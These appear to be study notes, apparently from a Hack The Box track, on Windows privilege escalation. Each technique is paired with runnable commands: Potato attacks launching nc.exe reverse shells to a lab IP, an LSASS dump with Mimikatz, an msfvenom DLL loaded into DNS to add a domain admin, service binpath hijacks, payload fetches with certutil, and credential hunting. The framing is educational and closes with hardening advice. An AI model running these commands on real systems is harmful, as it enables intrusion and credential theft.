Reference & Disclaimer
This article is based on my personal study notes from the Information Security Foundations track.
Due to scope and readability constraints, theoretical explanations, command details, output interpretation, and script code examples are intentionally highly summarized in this article.
For full explanations, complete command usage, real outputs, and detailed script implementations, readers are strongly encouraged to consult the full repository.
Full repository:
https://github.com/lameiro0x/pentesting-path-htb
Introduction
Windows privilege escalation is about moving from a low-privilege shell to local admin or SYSTEM. It often succeeds because of weak permissions, misconfigured services, or excessive group rights. This guide merges theory and commands into a practical workflow.
Workflow Overview
A reliable escalation workflow starts with enumeration, then pivots into privilege and service abuse, and finally checks kernel or patch-based options. You should prioritize low-risk misconfigurations before running exploits. This keeps the engagement stable and reduces the chance of breaking the host.
Host Enumeration
Enumeration tells you what you can do and what is likely to work. Capture network context, defense tooling, OS version, and user privileges before you attempt any exploit. Many Windows escalations are obvious once the environment is mapped.
Network and Defense Checks
Network data shows whether the host is dual-homed and which internal systems are reachable. Defense checks tell you what tools will be blocked and whether AppLocker is enforced. Use these early so you can plan safe tooling and transfer paths.
ipconfig /all
arp -a
route print
Get-MpComputerStatus
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
Get-AppLockerPolicy -Local | Test-AppLockerPolicy -Path C:\Windows\System32\cmd.exe -User Everyone
System, Processes, and Users
System and process data reveal patch levels, running services, and privilege context. User and group lists show which accounts are active and which groups grant extra rights. Always capture this before you pivot to any exploit path.
systeminfo
wmic qfe
wmic product get name
set
tasklist /svc
netstat -ano
query user
whoami /priv
whoami /groups
net user
net localgroup
net localgroup "administrators"
net accounts
Named Pipes
Named pipes are a common IPC mechanism, and misconfigured pipes can allow read or write access. You can enumerate pipes and check permissions with Sysinternals tools. This is a niche path, but it can unlock service abuse and impersonation flows.
pipelist.exe /accepteula
accesschk.exe /accepteula \\.\Pipe\lsass -v
gci \\.\pipe\
Privilege Model and Tokens
Windows assigns a token to each process that defines its identity and privileges. If a user has powerful rights like SeImpersonate or SeDebug, those can be abused to execute code as SYSTEM. Understanding which privileges are enabled is critical before choosing a technique.
User Privilege Abuse
User privilege abuse focuses on rights granted directly to a user account. These rights often allow impersonation, debugging, or file ownership changes that bypass normal ACLs. The sections below focus on the most common and reliable abuse paths.
SeImpersonate and Potato Attacks
SeImpersonate and SeAssignPrimaryToken allow a process to impersonate another token, often SYSTEM. Potato-style attacks trick a privileged service into authenticating to a listener controlled by the attacker. The example below uses SQL xp_cmdshell to launch a SYSTEM shell with JuicyPotato or PrintSpoofer.
python3 mssqlclient.py sql_dev@10.129.43.30 -windows-auth
enable_xp_cmdshell
xp_cmdshell whoami /priv
xp_cmdshell c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *
xp_cmdshell c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"
nc -lnvp 8443
SeDebugPrivilege Paths
SeDebugPrivilege allows you to access protected processes and extract sensitive data. A classic path is dumping LSASS and parsing it with Mimikatz to recover hashes or plaintext. You can also spawn a SYSTEM process by creating a child process from a SYSTEM parent.
whoami /priv
procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe
log
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
tasklist
.\psgetsystem.ps1; [MyProcess]::CreateProcessFromParent(612, "C:\Windows\System32\cmd.exe", "")
SeTakeOwnershipPrivilege
SeTakeOwnership lets a user change the owner of a file or object, then grant themselves access. This is powerful for reading sensitive files that are locked by ACLs. The flow is to enable the privilege, take ownership, grant rights, and read the file.
whoami /priv
Import-Module .\Enable-Privilege.ps1
.\Enable-Privilege.ps1
takeown /f "C:\Department Shares\Private\IT\cred.txt"
icacls "C:\Department Shares\Private\IT\cred.txt" /grant htb-student:F
cat "C:\Department Shares\Private\IT\cred.txt"
Group-Based Escalation
Group rights often provide indirect privilege escalation paths. Backup Operators, DnsAdmins, and Hyper-V Admins can all lead to SYSTEM or domain-level access. Enumerate group membership and then use the specific abuse flow for each group.
Backup Operators
Backup Operators can read files regardless of ACLs and can access NTDS.dit on a domain controller. Use SeBackupPrivilege tooling to copy protected files, then extract hashes. This is a high-impact path in domain environments.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txt
secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
DnsAdmins
DnsAdmins can load a DLL into the DNS service or abuse WPAD records to intercept traffic. The DLL load path is direct privilege escalation but requires a service restart. WPAD abuse can lead to hash capture or relay attacks.
msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
python3 -m http.server 7777
wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"
dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
sc stop dns
sc start dns
Hyper-V and Server Operators
Hyper-V Admins and Server Operators can often modify services or binaries that run as SYSTEM. The common pattern is to replace a service binary or change a service path, then start the service. Always verify permissions before attempting a change.
sc query type= service state= all
sc qc AppReadiness
Service Misconfigurations and UAC
Services are frequent escalation targets because they run as SYSTEM and often have weak ACLs. UAC can also be bypassed in specific scenarios when auto-elevated binaries load attacker-controlled DLLs. These paths are common and usually reliable in lab environments.
Weak Service Permissions
If a service binary is writable by Users or Everyone, you can replace it with a payload and restart the service. SharpUp and AccessChk are useful for discovering these misconfigurations. Always confirm the service runs as SYSTEM.
.\SharpUp.exe audit
icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
sc start SecurityService
accesschk.exe /accepteula -quvcw WindscribeService
sc config WindscribeService binpath= "cmd /c net localgroup administrators htb-student /add"
sc stop WindscribeService
sc start WindscribeService
Unquoted Service Paths
Unquoted service paths can allow execution of a binary placed earlier in the path. Enumerate auto-start services with unquoted paths, then check writable locations. If a writable directory exists in the path, drop a payload there.
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\\windows\\" | findstr /i /v "\""
sc qc SystemExplorerHelpService
UAC Auto-Elevate Checks
UAC bypasses often depend on auto-elevated binaries and DLL search order. Start by confirming UAC status and the current token, then check for writable directories in PATH. Only attempt UAC bypasses when you are already a local admin.
whoami /user
whoami /priv
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
REG QUERY HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin
Credential Hunting
Credential hunting is often faster than complex exploitation. Look in config files, PowerShell history, saved credentials, and common locations like user profiles. Credential reuse can unlock lateral movement or immediate admin access.
Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue -Include *.config,*.xml,*.ini,*.txt
Get-Content $Env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cmdkey /list
netsh wlan show profiles
File Transfer and Looting
You will often need to move tools onto the host and exfiltrate artifacts like dumps or hives. SMB servers and simple HTTP PUT/POST servers are fast and reliable in labs. Keep transfers in writable locations like C:\Windows\Temp or C:\Users\Public.
mkdir /tmp/share
cp tool.exe /tmp/share/
sudo python3 smbserver.py share /tmp/share/ -smb2support
copy \\10.10.14.143\share\tool.exe C:\Users\Public\
certutil -urlcache -f http://10.10.14.3/tool.exe C:\Users\Public\tool.exe
Kernel and Patch Checks
Kernel exploits are high risk and should be used only when version and patch level match. First enumerate OS and patches, then decide if a known CVE is worth attempting. HiveNightmare and PrintNightmare are common examples on outdated systems.
systeminfo
wmic qfe
icacls C:\Windows\System32\config\SAM
Common Tooling
These tools speed up enumeration and privilege escalation checks. Choose based on what the environment allows and what you can transfer safely. Use them as complements to manual checks.
- Seatbelt
- winPEAS
- PowerUp / SharpUp
- JAWS
- Watson
- LaZagne
- Sysinternals Suite (AccessChk, PsService, PipeList)
Hardening Notes
Privilege escalation succeeds when patching and configuration hygiene are weak. Keep systems updated, reduce unnecessary local admin rights, and lock down service permissions and startup paths. Audit regularly and enforce AppLocker or WDAC where possible.